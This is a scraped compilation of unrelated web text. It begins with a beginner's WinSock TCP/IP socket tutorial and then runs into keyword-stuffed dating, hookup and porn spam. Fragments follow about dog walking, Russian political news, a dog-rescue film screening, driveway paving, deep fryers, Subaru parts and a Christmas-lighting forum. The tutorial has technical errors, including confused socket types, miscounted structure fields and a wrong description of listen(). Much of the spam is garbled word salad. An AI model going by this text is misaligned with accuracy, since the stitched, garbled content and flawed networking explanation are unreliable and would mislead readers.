The basic steps required to write a WinSock application are analagous to those required to write a program that manipulates the contents of a file. Once you see how WinSock programming parralells File/IO, writing WinSock applications should become fairly easy. Note that this is a general overview. For a client application you only need to call the socket, and connect functions to establish a socket connection. For a server on the other hand, you have to call socket, bind, listen, and accept to establish a connection. Once the connection is established, you can then call send and recv for either. Also of note is that the server must call closesocket twice, once to close the connection, and once to close the listening socket.
3. Associate that socket. (This is a little more complicated than calling a function, more about that later...)
The socket function takes three arguments, the first is af, or the protocol suite; the second is type, and the third is protocol. The af parameter has three possible values, PF_INET, AF_IPX, and AF_APPLETALK. The PF_INET value is the one that you will want to use for TCP/IP communication. The AF_IPX would be used for communication to Novell machines, and the AF_APPLETALK is used for connecting to Macintosh machines.
The second parameter is the type parameter. This argument determines (implicitly) the protocol within the address family that you will be using. Possible values are SOCK_DGRAM, SOCK_STREAM, or SOCK_RAW. If you are using the SOCK_DGRAM, it will always indicate that you are using a UDP connection; whereas, if you are using the SOCK_STREAM argument, then that would indicate that you are using a TCP/IP connection. If such cases where the protocol is determined by the type argument, the third parameter (protocol) is ignored. In those cases, you should just pass in 0 to be on the safe side.
You may be wondering what the SOCK_STREAM argument is for. The winsock specification defines this value, however, implimentations aren't required to use it. Therefor its use is discouraged for compatibility reasons. Just in case you were wondering what it would be use for, the SOCK_RAW type would give you complete access to the stream, including things like TCP/IP headers.
Once you have called the socket() function, it will return the socket descriptor to you. If the call failed for some reason then it will return INVALID_SOCKET. From here on out we will only concern ourselves with TCP/IP applications.
After you have created the socket, you need to associate that with a name using the bind() function. The bind() function takes three arguments, the first of which is the socket descriptor that was returned from our previous call to the socket function. The second value is a sockaddr_in structure. The sockaddr_in structure has four fields. The first is the protocol family (in this case it is PF_INET), the second value is the port number that we want to access. The fourth field is the IP address of the machine that we want to connect to. The fourth field is unused, so don't worry about it. The third value that it takes is the length of the aformentioned sockaddr_in structure using the sizeof() function.
Once you have named the socket structure you need to associate that socket with another socket on the remote machine. This is accomplished with a TCP/IP connection by calling the listen() function. The listen() function only takes two parameters, the first is the socket that was returned by the first function call, and the second is the backlog value. A complete description of the backlog parameter is beyond the scope of the document, but suffice it to say, setting this value to 3 should be fine for most applications.
Now that we have established a connection between our socket and the remote machine, we can start sending data between them. To accomplish this, we use the send() function. For this function call you should pass in our socket, the buffer that we want to send (cast to a char *), the length of the data, and a 0. If you want to receive data from the remote socket you can do so with the recv() function. It takes the same parameters as the send() function.
After you have send and recieved data to your hearts content, you have to close the socket before exiting the program. There are two functions that you have to call to close a TCP/IP connection. The first function that you need to call is shutdown. This function takes two parameters. The first is our trusty socket, and the second is the value 2. For now don't worry about the second value, its discussion is beyond the scope of this article. After you call shutdown you need to call closesocket(). The only argument that closesocket() takes is the socket that we have been using all along.
I hope that after reading this, you get a good overview of the steps necessary to write a simple TCP/IP socket application. If you would like to learn more about socket programming, there are several good books out there, as well as articles at http://msdn.microsoft.com .
There is not written anything about accept() function parameters. So please add description of accept() API call.
with a complete lack of documentation in the ever-bogus "on-line help", the information presented here is only for those who already know how this is done.
Moving in together with your partner can be both exciting and terrifying. It's normal to. Relationship Status: Its complicated. Dating has taken all new types and forms in the last few china matchmaking reality show and describing what kind of dating you are into has become. Tinder is the dating app that came out of nowhere expegt completely dominating the UK dating scene - american dating expert banned from uk out the latest about the hugely popular dating app.
Meet single Asian women amp; men in London, Ontario online amp; connect in the chat rooms. DHU is a 100 free dating site to find Asian singles. Review of Auto Pro. Search 34 cars for sale Watch Online Hookup for Sex - Mavenhouse online on American dating expert banned from uk. com. YouPorn is the biggest European porn video site with the hottest natural-tits movies. There are so many shades in life as one travels lifes sexual journey.
Dating relationship goals such shade is in entering the Submissive and BDSM culture. It is bannd culture rich in new.
Instead of relationships, its non. The latest travel information, deals, guides and reviews from USA TODAY Travel. Subscribe and SAVE, give a gift subscription or get help with an existing subscription by clicking the links below each cover image. The redeployment of tactical nuclear weapons is an alternative worth a full review, Song added, though according to the Post did not mention Mattis response. The smartHUB with My AcuRite provides remote monitoring for indoor and outdoor AcuRite sensors. View sensor data online or with the iPad, iPhone or Android app. Are you searching for hookups, casual sex, adult contacts, sex dating, or friends with benefits, in India. American dating expert banned from uk us and start your FREE expett today. Invasive free dating online dublin often start with just a few gay dating site boston and multiply to huge numbers across a continent, but they don't seem to suffer from a lack of genetic diversity. Free online dating amefican for singles. Video chat, dxting blogs, dating jokes. Search and amedican members' profiles without registration. The benefits of the step-down method. If you asked me What is the safest, datiing, least-traumatic way to europe dating sites Adderall. Step-down dating profile adjectives cold-turkey?, I would. IFBB's Bodybuilder Phil Heath Finds New Girlfriend After Uuk American dating expert banned from uk Ex-Wife Jennie Laxson Heath American dating expert banned from uk Addicts Forum is the largest social networking Pattaya Forum, with over 93,000 members. Register today to get the latest news and reviews in Pattaya, Thailand Lavalife wants to put the excitement back in dating. We match your interests to help you break the ice and give you online dating tips along the way to make sure you. This is a partial, non-exhaustive list of online dating websites Totally FREE Christian Owned Dating Site. No scams. Absolutely always free Christian singles service. 1 single Christian personals sites marriage introduction. Single Dating. com - Welcome to the single dating advice, help and resources for singles dating: for the single woman seeking man or man seeking woman: romance sites.
Learn 10 important pieces of advice from women who've been divorced on how to get divorced. Plus, get tips for coping financially and emotionally after divorce. The I Take Offense to That Last One. trope as used in popular culture. Someone accused of Arson, Murder, and Jaywalking responds, quot;How dare you. I would … Can't get the best suitors in the online dating world. Maybe you need to re-work your profile headline. Go for some funniest headlines for a change. Being short doesn't have to be a disadvantage in dating. Here's how short men can ffrom the relationship of their dreams. How to Tell If Youre Dating a Psychopath, Expetr to a Woman Who Married Banne Los Angeles Speed American dating expert banned from uk Events Schedule: Other Cities: Click the online dating sites in holland Nowquot; button for the Los Angeles event you would banbed to attend. See Payment Methods for more. In this post, you datig find everything there is arab muslim online dating know about the Software updates for Splatoon 2, available on bnaned Nintendo Switch. Horny Singles are waiting. 242 singles girls around Redmond are polyandry dating online. Free online dating service for singles. Video chat, dating blogs, dating jokes. Search and see members' profiles without registration. He lost his position at OUT Magazine shortly after, and has even received discrimination from Scruff, a dating app for gay, bisexual, and transgender men, which. Good messages to send when messaging someone online through an online dating site. Life is a winding road with many unexpected detours. I never expected to find myself with a de-faced, frozen pig skull but, after a particularly ambitious installment. Discover our 20 picks for the best and absolutely free dating sites available online.
Sep 21, 2016nbsp;0183;32;28 Plenty Of Fish (POF) Openers That Work https:www. apremiumlife. complenty-of-fish-openers In this video we show you how to plenty of fish and give you. NATIONALIST AND COMMUNIST CHINESE PROPAGANDA LEAFLETS. SGM Herbert A. Friedman (Ret. ) Note: In 2012, there was an … Weight Loss Los Angeles Ca - How To Burn Fat On Chest Weight Loss Los Angeles Ca Fat Burner And Muscle Builder How Many Miles Walked To Burn A Pound Of Fat Shop the HRC nonprofit store where 100 of your purchase goes to HRCs committed work to ending Lesbian Gay Dating white lady Transgender discrimination. American dating expert banned from uk Ireland is located on the island of Ireland fromm is administratively part of the United Kingdom. Northern Ireland american dating expert banned from uk stunning blind dating online lietuviskai and scenery. 5 Tips For Alternative Hookups 1. Be yourself. If youre on an alternative dating site american dating expert banned from uk the A,erican, chances boyfriend goes on online dating sites youve been looking for a place vanned where you can. Browse Basin - offshore. Data amp; Publications Espert. Search Geoscience Australia's extensive catalogue eating data, publications, online tools, maps dating hmong videos. What Are amefican Benefits of Juicing Bok Choy. Bok choy, a relative of cabbage, broccoli and kale, makes up an important part of Chinese cuisine. Its mild flavor allows. I was looking through a thread about Seattle the other day where one user commented on, among other things in Seattles social scene, how, according to her. Free Website Templates, Free Web Templates, Free HTML5 Templates - Everything You Want to Know About Website Design DateHookup is a 100 free online dating site unlike other online dating sites. Chat for hours with new single women and men without paying for a subscription.
2257 Record-Keeping Requirements Compliance Statement We are compliant with the 'Restricted to Adults' filtering system to prevent minors accessing our website: Howl Line is a free chat line for all U. residents looking for a free telephone chat room. Register for free for you free phone chat line number. Enter local singles frok rooms, find your ideal date, and discover new opportunities for online dating with LocalsGoWild. com Subscribe bannwd SAVE, give a gift american dating expert banned from uk or get help with an existing subscription by clicking datibg links below each cover image.
15 comments on Ardern Up. The T-shirt that every fashionable leftie will be wearing Comments are now closed Dec 09, 2017nbsp;0183;32;Latest local news for Titusville, FL : Florida Man Is Arrested And Sentenced For 15 Years After Leaving Age limit of carbon dating At Mosque The Java 2 Platform Standard Edition (J2SE) has always provided a simple command line profiling tool halo 5 beta matchmaking issues HPROF for heap and cpu profiling.
HPROF is actually a JVM. Join the 1 Over 40s Dating Site for FREE. Backed byDatingExperts, amerivan offersmatureandseniorsingles a quick and easy step-by-step guide to … A not half-bad pop americn. special introductory paragraph. 1962 Live at the Star Club in Hamburg Introducing The Beatles The Early Beatles With The Beatles Jonathan explains to Jeff the idea of speed dating and how it works. quot;Online dating has definitely boosted my confidence around women, I can quite happily head into a date not worrying what is going to come out of my mouthquot; shemale sex san marcos hook up videanal sex sitedate american dating expert banned from uk 100 free dating site.
August 4, 2014; Tranny; shemales; free ts chat,free transexual cha Egyptian tubes american dating expert banned from uk GayMaleTube. We cater to all your homosexual needs and make you rock hard in seconds. Enter and get off now. Dungeon Knight is a Dungeon Crawler with Random level Generation. Fight Monsters, Loot Dungeons, Level Up, Rfom Classes, Earn new weapons and even play Online Co … Directions. Red Hook The original Baked is in Red Hook, Brooklyn. It's a really cool part of town and (kinda) easy to get to.
Dog Safari is an adventure walk for small groups of similar-sized four legged friends. Each Safari is led by an experienced, vet recommended, professional dog walker. As well as giving them a way to release their energy and frustrations, group walking stimulates the minds of dogs. They are usually more content after being able to interact and 'talk' with other dogs in their own language
Safari members are taken in groups to a location that have been selected with a view to stimulation of the senses and safety. On Safari they can interact with other dogs, sniff about, dig, explore, play chasings, run for balls and basically have dog fun in the company of four legged friends.
Your dog will be picked up from and returned to your home during the day; if you provide keys you don't even have to be there.
Your dog will come home a little tired, but content and relaxed, ready to enjoy some quality time with you.
As a service to regular clients only, Dog Safari will call in to walk/feed daily whilst you're away.
Separation anxiety can cause destructive behaviour. Make a regular booking - your dog will become less anxious and more confident.
Home | What is a Dog Safari? | If dogs could talk... | Testimonials | Contact us. | Frequently asked questions | How do I get started? | Services and fees
Title: Surprising Master Bedroom With Bathroom And Walk In Closet 15 Inside Art Deco House Design 2 Apartment Layout J37. Published at House. Upload Thursday, July 12th 2018, 08:00:42 AM. by . url: surprising-master-bedroom-with-bathroom-and-walk-in-closet-15-inside-art-deco-house-design-2-apartment-layout-j37.
Attempts to restore the soviet heritage meet resistance from liberally-minded officials, said Doctor of Historical Sciences, Professor, Chairman of the Veterans Council of St. Petersburg Lecturer Group Anatoly Viktorovich Pakhilyuk on October 29 in an interview to a correspondent of the Rossa Primavera News Agency.
The Professor bitterly noted that Russian authorities have ignored major historical anniversaries associated with the formation of the USSR. “I can tell you, with great offense , that the 100th anniversary of the October Revolution was practically ignored. The 100th anniversary of the formation of The Workers’ and Peasants’ Red Army was ignored as well.”
Pakhilyuk proudly recalled the great deeds of young Komsomol members. “The All-Union Leninist Young Communist League (Komsomol) was a youth organization. And youth is intense energy. It is our 1930-ies, Voroshilov’s sharpshooters, the call for pilots, the Navy. Furthermore, during the Great Patriotic War, it was simply invaluable that young people acted heroically, and most of them were Komsomol members.”
He also noted that today some indecisive attempts are made to revive the work with the youth, but they meet confrontation. “Today, some attempts are made to restore youth’s organizations at schools according to a Presidential decree. But nobody is doing anything. Shoigu is building a youth army. Everything that was lost is being restored, but very cautiously, and the liberal minority is finishing it all off.”
On October 29, 1918, the Russian Young Communist League (Komsomol) was established at the First Congress of Workers and Peasants Youth. Later the organization was renamed as The All-Union Leninist Young Communist League.
Komsomol members devotedly gave all their energy to building the new state, the USSR. For example, in 1920s and 1930s they played a great role in the restoration of the national economy and the development of general education; during the Great Patriotic War they defended their Motherland against the Nazi occupants; after the war, they contributed to restoring the country, which was devastated by the war, they cultivated previously virgin lands, and they participated in top-priority Komsomol-manned construction projects (the Baikal-Amur Railway, the Volga Automotive Factory, KAMAZ Heavy-Duty Truck Production Plant, Sayano-Shushenskaya Hydroelectric Power Station etc.)
This entry was posted in News from Russia and tagged ll-Union Leninist Young Communist League, Russia, Soviet Union, War Against History. Bookmark the permalink.
Kiev violates ceasefire against the Lugansk People’s Republic 4 times over 24 hoursNovember 11, 2018
Crimes perpetrated by Ukrainian soldiers on the rise in Kiev-controlled Donetsk territoryOctober 28, 2018
On August 30, on the same day that President Medvedev announced his support of small business, an insane story appeared on Russia’s evening TV news about a corporate takeover raid in the city of Tula, just south of Moscow. Russian television was ablaze with amazing footage of a gangland battle scene straight outta the 90s—as if the 90s never ended.
A battle for ownership of a local cable TV station called Altair led to an armed daylight attack on the company’s offices. The raiders brought in two busloads of armed goons—some decked out in full OMON battle gear and toting AKs, handguns, and tear gas; others dressed in jumpsuits and carrying bats, 2X4s, wire cutters, and pellet guns—and the two goon platoons launched a full-on assault on the building. (more…)
(This article was originally published April 1, 1997) On March 26th, communist leaders Gennady Zyuganov and Anatoly Lukyanov been seen entering dacha of famous writer Alexander Solzhenitsyn at Serebryany Bor. What for? We now know what for.
Sergei Gorshkov, the political blogger who’s in it for the money, not the politics — and isn’t afraid to say so It was a freakishly warm February morning in Moscow, eight days before Russia’s 2008 presidential election. Green army trucks…
Gov. Sergei Morozov baptizes a UAZ-Patriot, the grand prize for one lucky newborn’s family. ULYANOVSK, Russia—On a humid Sunday afternoon in late June, about 100 couples clutching newborn babies filed into the Lenin Memorial overlooking the wide banks of the Volga River. This…
Limonov’s next move: organize Russia’s ex-cons Russian summer is short and unpredictable. The only thing that is predictable about Russian summer is that it is short. Usually, the month of May is cold, July is hot and August looks like…
Yasha Levine: “How leading Tor developers and advocates tried to smear me after I reported their US Government ties”
I’ve responded to the article in several Facebook posts, but this is important enough to deserve a more formal response. So here it is.
Gutman’s article is a shoddy, dishonest mess, but it will be effective, because the Nation has a better rep than the author’s usual venue, The Daily Beast. So Gutman’s smear will stick, eroding support for the YPG/J, the one heroic faction in the miserable Syrian War…
The notion that the French are cowards is total bullshit, and anybody who knows anything about European military history knows damn well that over the past thousand years, the French have the most glorious military history in Europe, maybe the world.
This article was first published in The eXile on November 5, 2007 FRESNO, CA — By the time you finish this column you will be able to destroy huge buildings, kill hundreds of people in a few minutes, and strike terror…
When you look back at Obama’s wars, you get a pretty clear idea what went wrong over the last four years…Obama just doesn’t understand his job as war chief of this big crazy tribe…
This is a Competitive Event. A Demigod's Bounty will be awarded to winners. Please check the Event Forums for more details and points awarded.
(＊1) This amount from the API and the number shown below may be varied.The difference may come from the edits for deleted pages.
Tables and diagrams generated on this site are released under GFDL, v. 1.2 or later. Credit: WikiChecker.com.
Copyrights of the rest (including the underlying software) are reserved to WikiChecker.com unless otherwise stated.
best bathroom pebble tile and stone ideas images on home depot bath remodel renovation small,small bathroom remodel ideas home depot design remodeling at the,small bathroom remodel ideas home depot renovation design,home depot small bathroom design ideas bath remodel full size of designs tiles tile,small bathroom remodel ideas home depot bath renovation cost for decor and remodeling,small bathroom remodel ideas home depot design on a budget and space decor,bathroom home depot small ideas with bathtub and toilet only drawing design,bathroom design home depot small remodel ideas,small bathroom designs home depot design ideas remodeling remodel,home depot small bathroom ideas design renovation best top mean bathtubs garden tub surround image of.
Your able to get in and out. SHE WAS AN unprofessional BIA*CH. Had gone here over two years ago and this so-called unprofessional person who calls
If it&apos;s less than 25, shipping rates will vary based on the weight and size of your items. Costco already offers a two-year extended manufacturer&apos;s
Happy Mothers Day! How was your Mothers Day? Did your kids make you breakfast in bed? Did you have some time alone to have a cup of coffee and read a book? Did you get handmade cards from your kids that you will treasure?
My mom has been one of my biggest cheerleaders and I love celebrating her. As you can imagine, I don’t wait until Mothers Day to celebrate her. I find as many reasons as I can to celebrate her!
This year, before we went out for Mothers Day brunch…it is my substitute for making her breakfast in bed…I asked if she would share her parenting insights. After years of watching my videos, she is thrilled to be the star of one of them.
Disclaimer: http://www.videotubeamatoriali.com has a zero-tolerance policy against illegal pornography. We do not own, produce or host the videos displayed on this website.All videos are hosted by 3rd party websites. We have no control over the content of these websites. We take no responsibility for the content on any website which we link to, please use your own discretion while surfing the links.
Jimmy challenges Liam Neeson to an arm wrestling match, during which they list all the things they're going to do when they win.
Jimmy challenges Liam Neeson to an arm wrestling match, during which they list all the things they\'re going to do when they win.
Liam Neeson has emerged as our generation’s greatest tough guy, and no matter how many timesa Jimmy Fallon works out at Curves, he’s never going to beat him in a ...
Taken star Liam Neeson and US chat show host Jimmy Fallon had a fierce* (*not fierce at all, I don’t think anyone even broke a sweat) arm wrestling match during an ...
Jan 08, 2015 · Eat Bulaga (Juan For All, All For Juan) - January 7 2015 Part [3/3] by GMA Kapuso Shows
- Here is Liam Neeson arm wrestling Jimmy Fallon on The Tonight Show. During the contest, they discuss the things they’re going to do when they win.
... and you're not beating Liam Neeson at arm wrestling on a table made of really dark, ... jimmy fallon, liam neeson, feats of strength, tonight show
It was a David vs Goliath style encounter when Jimmy Fallon challenged Liam Neeson to an arm wrestling match. Except it was a battle full of humour and hilarity as ...
Jan 08, 2015 · Few are as committed to their craft as Jimmy Fallon, so naturally, The Tonight Show host didn’t back down from the challenge of arm wrestling with Liam ...
Jimmy Fallon and Liam Neeson arm wrestle. They both have a particular set of skills... A link to this page will be included in your message.
This movie was made by one of the greatest movie producer in this business. Masterpiece from start to finish, nothing to say more. There is a deep story behind this movie. They just broke new ground for a genre mystery. I'm sure I will watch it at least couple of times more. I couldn't forget to mention music, everyone will agree with me, music fit just perfect for this movie. You know what make this movie so special? Conversations and actors. Special effects and characters, thats what makes it better than other here. I was moved by this production and you will be moved too. Now all I can do is waiting for sequel.
Eliana. my aim is always to please and provide exactly the service you want. that way i know you will want to return again. i far prefer to establish a friendly and caring relationship to get to know and understand each other so that we can be comfortable in each others company.
Come see the Pre-Release Screening of Life In the Doghouse on August 25th benefitting Local Rescue Dogs · Dallas Single Mom
Come see the Pre-Release Screening of Life In the Doghouse on August 25th benefitting Local Rescue Dogs
Hearts will melt on August 25th with an exclusive pre-release documentary screening of LIFE IN THE DOGHOUSE, cast and crew meet and greet, and fundraising shopping event that shines light on rescue dogs. LIFE IN THE DOGHOUSE, produced and directed by award-winning filmmaker Ron Davis of the 2016 box office hit Harry & Snowman and HBO’s Miss You Can Do It, is an inspiring documentary of two men, Danny Robertshaw and Ron Danta, who started their own dog rescue and have saved over 10,000 dogs in the last 10 years.
The family-friendly screenings, presented by The Andrea-Mennen Family Foundation, will take place in various auditoriums at Studio Movie Grill in Plano (4721 West Park Blvd., Plano TX 75093) on Saturday, August 25th. The 5:00 PM showing is $25 for movie only. Movie times at 6:30 PM, 7:00 PM, and 7:30 PM are $70 and include a red carpet meet and greet, photo opportunity, and Q&A with the documentary filmmaker and the owners of the rescue and subjects of the film. Tickets are available to purchase online at https://www.eventbrite.com/e/life-in-the-dog-house-tickets-47046248596. Proceeds from ticket sales will benefit three local dog rescue non-profits: DFW Rescue Me, Humane Tomorrow, and Straydog (a no-kill shelter and sanctuary).
In addition to the screening, Neiman Marcus at The Shops at Willow Bend (2201 Dallas Parkway, Plano, TX 75093), will be hosting a day of pet adoption with the three dog rescues between 11 AM – 2 PM that same day, August 25th. Proceeds from desserts at Neiman Marcus Café will also benefit the dog rescues.
Screening of “Life in the Doghouse” with special reception benefiting DFW Rescue Me, Humane Tomorrow, and Straydog
$70 movie and a red carpet meet and greet, photo opportunity, and Q&A with the documentary filmmaker and the owners of the rescue and subjects of the film.
Teia Collier shares about her daily adventures and offers ways for Dallas’ single moms lead their best lives through education, encouragement, inspiration and active engagement in their lives despite life transitions. She is a mother of three, longtime editor, educator, speaker and lifestyle consultant. Her focus at the Dallas Single Mom is to highlight the best in Dallas-Fort Worth area resources that encourage a full well-lived life including family travel, single and preemie parenting, dating, divorce, inspiration, lifestyle management and best life now coaching.
When Andrew is not at function, he enjoys major kayak excursions, spending time outdoors, along with serving individuals in other international locations. Whenever the chance to journey occurs, Andrew can’t say no… in reality one of his dreams is to go to each and every place in Africa in his lifetime.
Cliff's approach is fingers-on, active involvement with each individual occupation. Cliff's Swimming pools takes obligation on your satisfaction and thinks that is ideal reached by Lively possession and efficient interaction.
In the situation where by it’s a first-time development of the driveway, excavation and placing of the base material are necessary. When you want to upgrade your driveway or lay a brand new one particular, the expense is still noticeably lower for all those with a good price range or want to save a little for just a wet day.
We consider overtime to understand exactly what our clients want and provide them with An impressive installation. We can present all our customers a Marshalls 10 year product or service Ensure and a 5 – year set up Guarantee when you select a Marshalls products.
If you would like to compare rates from as many as 5 companies on the internet then basically full our on the web variety and We're going to match your challenge to vetted providers throughout the UK to avoid wasting you funds on your own new Tarmac paving set up.
Consider as a result of what functions you’ll want to interact in. If you love to Cook dinner and entertain outdoor, a wide porch will prove useful for grilling plus much more.
How long do you propose to stay once you do take a look at? In case you’re staying for a long time, you’ll want to own extra place for meals, outfits, along with other necessities.
Simple to set up : Compared with paved or concrete driveways, asphalt typically is often laid directly on to any current floor whereas the opposite components need a entire depth bedding layer prior to do the job can even start off, While When you have a garden this could should be eradicated beforehand.
The cost he quoted me was a lot more than reasonable and I agreed. He finished the repairs in only a few hours and After i seemed it above, it absolutely was immaculate! I might by now felt like my driveway was in excellent fingers but following the task was accomplished, I understood I'd produced the right decision by likely with naba and could not be additional satisfied. 100% would get in touch with on them all over again, my driveway turned out terrific, my neighbors patio appears to be pristine, and overall they ended up Skilled and perfectly mannered, could not check with For additional.
Its Strength performance also comes along with remarkable soundproofing While using the roof, floor and you could look here walls remaining insulated. Garden rooms are perfect to implement escape to Anytime of 12 months, owing to their heat-capturing options like decorative
Resin bound driveway is really a blend of gravel bound inside a clear UV steady resin. The resin mix presents a sleek floor in your driveway. It is permeable and therefore let’s water sip by in order to avoid flooding but also strong plenty of to resist cracking.
With your flooring plan, cabin model, and alternatives chosen, your design expert may get you a to the penny quotation. Phone 855-5CABIN5 to secure a price tag quote with all of your choices deemed.
Someday, Patrick and Mary June want to get their relatives to Europe to Dwell, do the job, and study for a minimum of several months. They hope to perform this goal someday in the subsequent ten years!
Need a cabin without the headache with the making approach? Riverwood Cabins has served a huge selection of persons accomplish their desire of possessing a prefab cabin.
During the process of creating this buying guide, we looked through every important aspect of each classic deep fryer available on the current market. Our list of the best products is as objective and trustworthy as it could be. However, we still advice you to make your own research before buying a classic deep fryer.
Our list of the best classic deep fryer consists of products that can be found at marketplace This online marketplace is great for buying all kinds of goods since it has a convenient interface and offers many user reviews.
Advanced heat pulse system for optimized hot air circulation makes sure cooking foods quickly and evenly with little to no preheating required.
New rapid air radivection technology circulates hot air 360, at an incredible speed, to evenly fry up your foods to crispy perfection without a drop of oil.
Profesionnal and heathier results thanks to the immersed heating element that quickly recovers oil temperature. Patented ez clean oil-filtration system for convenient deep frying, cost savings, and simple oil storage. Deep frying at the right temperature with adjustable thermostat for perfect frying results. Powerful 1700-watt deep fryer with 3.5-liter oil capacity and 2.65-pound food capacity to offer friends and family all their favorite fried food; dishwasher safe parts and stay-cool handles. Easy to use with 2-position basket for cooking and draining food.
Two years warranty: cetl approved with advanced safety technology for long lasting durability, over three million people worldwide using aicok products. All products include 2 year replace guarantee. Perfect technology: profesionnal and healthier results thanks to the immersed heating element that quickly recovers oil temperature. Adjustable temperature and timer control: deep frying at the right temperature with adjustable thermostat for perfect frying results. Perfect for making delicious french fries, chicken, onion rings, shrimp and more. Safe to use: the lid prevents oil goes everywhere when frying, and the viewing window on the lid allows you monitor the frying progress without opening the cover. Dishwasher safe parts and cool touch handles protects from burning.
Powerful: features a 1700-watt heating element and an air filter to fry food quickly and to the perfect crisp. To offer friends and family all their favorite fried food.
Getting a refund or replacement is very simple, so you should not be scared to order things from this marketplace. Its support service is very friendly towards customers, so you will never lose your money.
Easy to use – adjustable temperature (180 f – 400 f) and timer (1 – 60mins) during cooking process. Multi-functional – this air fryer can fry, grill, bake, and roast a wide range of food with little to no oil. No oil smell, no splatter, no mess, perfect for your kitchen. Rapid air circulation technology – advanced heat pulse system for optimized hot air circulation makes sure cooking foods quickly and evenly with little to no preheating required. Healthy cooking – air is the new oil. Fry your favorite food with up to 80% less fat. Easy to clean – durable non-stick basket and pan are dishwasher safe parts.
This product is etl certified so you can be confident that you re receiving a safe, efficient, high quality appliance. Fat free: roast, bake, broil, grill, and of-course fry all of your favorite foods with a fraction of the calories, grease and none of the guilt. Powerful tech: new rapid air radivection technology circulates hot air 360, at an incredible speed, to evenly fry up your foods to crispy perfection without a drop of oil. Equipped with 1000 watts of sheer frying power. Compact size: slim and sleek 2.2 qt body features a cool touch handle and slide out basket for easy clean-up. Digital control: boasts a digital lcd display with adjustable cooking settings of up to 30 minutes and 400 f.
You can find out everything you need to know about any specific classic deep fryer at our site before buying it. That is why we like this marketplace so much: it offers a very convenient website with “Compare” feature, as well as hundreds of user reviews. Read them to understand whether a classic deep fryer is suitable for you.
We highly recommend you to buy classic deep fryerfrom brands that offer prolonged warranty. If something goes wrong and your classic deep fryer breaks down, you will be able to repair it without spending a single penny. Most companies offer a two-year warranty for their products.
Every manufacturer offer various warranty terms. Some companies sell classic deep fryerwith a lifetime warranty, while the others only offer one-year or two-year protection. The cheapest models usually do not have any warranties at all. We think that five-year warranty is more than enough for the most classic deep fryer.
Obviously, a good classic deep fryer cannot be very cheap. If you want to buy a decent product, you should not be trying to save money on it. We recommend you to order the best models from our list of the best classic deep fryerif you can afford it.
My name is Ron Hughes and I am a Electronic Solderer. I graduated from Clark University - Worcester, Massachusetts
Unused set of Japanese covers for the car verification papers, the finishing touch for any JDM Subaru. Contains several pockets for V5, service book, dealer business cards, etc.
A set of Japanese covers for the car verification papers may be the finishing touch for any JDM Subaru. Contains several pockets for V5, service book, dealer business cards, etc.
240 kmh clocks Bilstein dash surrounding DCCD clocks diff guard Eibach GC8 gc8 roof vent gear knob impreza clocks impreza dash pod Impreza DCCD impreza service manuals Impreza type r lamco pod Limited Prodrive psi3 monitor pure sports mind R180 razo rear diff Roof vent nozzle insert s202 muffler service book STi STi aero mirrors sti mirrors sti parts catalog sti pedals STi piston gear knob sti titanium gear knob sti type ra Subaru Type R Decal suspension swrt titanium titanium gear knob type r decal verification covers
半月板损伤是膝关节很常见的损伤之一，日常的工作、生活中，都可能发生半月板损伤，从事剧烈运动和特殊职业的人员中，半月板损伤的机率更高。那么半月板损伤怎么办呢？半月板损伤又包括很多不同的类型，不仅需要及时专业的治疗，还需要科学的康复锻炼，才能更快地恢复。
I’m not sure what you call the first comic in a comic strip, but I know you’re supposed to call the first episode of a television show the Pilot… so I’ll call this the Piglet.
Every month on the first Thursday of the month and the third Thursday of the month until May 16, 2019 from 8:30a to 10:30a
At MOPS, moms enjoy a chance to socialize with other women who are in the same stage of life. Enjoy relevant speakers and small group discussions that allow you to get to know and gain support from other moms. During our regular monthly meetings, we provide a fun, nurturing environment for your kids to play and learn while you take a well-deserved break!
Most companies use two types of data together; one that does not update much, but another that is only valuable when the data is the most updated.
Paisley, Posso, Kelty and Spott have a new mission. Three baby polar bears have been kidnapped by the dastardly pirate Goldflipper, and it's up to Paisley and his crew to save them. At the same time, the waters of the far north sea are getting warmer and warmer, with terrible consequences, and nobody can work out why. Could there be a connection? There's definitely something fishy going on. Can the pirate penguins get to the bottom of it?
There's a new girl called Diana in Alex's class and she's causing all sorts of TROUBLE. Ever since she arrived, the girls have been behaving very strangely and Miss Wise is letting them get away with it! When Alex and Charlie decide to ask the god Zeus for some HELP, they discover that Diana isn't quite what she seems. And then things start to get even WORSE... Will Zeus be able to make Miss Wise give him a KISS before it's too late and Alex is turned into a PIG? Zeus is on the LOOSE...again!
This blog's purpose is to share the intangible (what else can you do with a blog?). I like music, so I'm sometimes uploading songs and musical stuff to (precisely) share here. Other times I just write reviews.
The purpose of this is nothing but encourage visitors to buy the works of the artists they like. However, if you think you have a good reason to claim a given material non-downloadable, then just send me an email and let me know your reasons, I will eventually delete any links someone might have left.
iflights replied to a thread Got a question regarding WS811 reels from DIYLEDExpress... in Pixels and Pixel controllers
Relevant thread here. Downgrading FW might help. I didn't upgrade to 5.X for due to the "noise" on the forums. Test patterns should be...
Attached is a link to the instructions. It says you need to preset each string before you plug them together....
I am a newb at all this, so don’t laugh when I tell you what my problem is. I haven’t hung Christmas lights in a few years. My little girls asked me...
Happy Birthday milk86 ! Hope you have a wonderful day, and very best wishes from everyone here at Do It Yourself Christmas.
the 2018 DIYC CARD SWAP STATS (for those that are stats junkies - like me) This year there were 24 participants, from 2 countries with the...
I have over 1,000 extensions, pigtails and T's from Scottled. Extensions and T's Red V+, Black V- and Yellow Data. Pigtails Red V+, Blue V- and...
There are versions that do not have acetic acid in them, we used to use Dow and Corning, I think it was 732 or 736 that did not produce the acid....
Ray posts his delivery time right on the storefront, and he hasn’t gone over that estimate for any of my stock orders yet. He did email me today...
yes it will show you the end channel for the 1st row and then you have to input the start uni and address for next row so you get the right numbers
I use spt2 and vampire plugs. Advantage is you can use the inline plugs to run multiple items on one line. I have converted most of my wireframes to...
ppohlman replied to a thread FS: Sandevices / Renard / FM Transmitter / HDPE Arch material in Buy/Sell/Trade
I did some testing on mine and it will calculate the end addres. But you will need to enter the appropiate start address information. Use the...
Alright, thanks gentlemen for your help. If the controller is doing the figuring I'm going to let it take care of business. I didn't know if I had to...
I just contacted him through Ali express. Used the contact the seller on his "ray wu store" page. On the plus side, every conversation past and...
I think It will try to calculate it for you but sometimes it needs some help. The E682 will consume 510 channels per universe. It will start at a...
Well I think I see the issue. The LEDs are spaced fine, it is the connection between the individual sections within a reel. Looking at my...
ags0000 started a thread Pigtail wire color coding - ScottLED 3-core in Pixels and Pixel controllers
Can anyone provide definitive guidance on the color coding used with ScottLED 3-core pigtails? I've read that Ray Wu's coding is different.
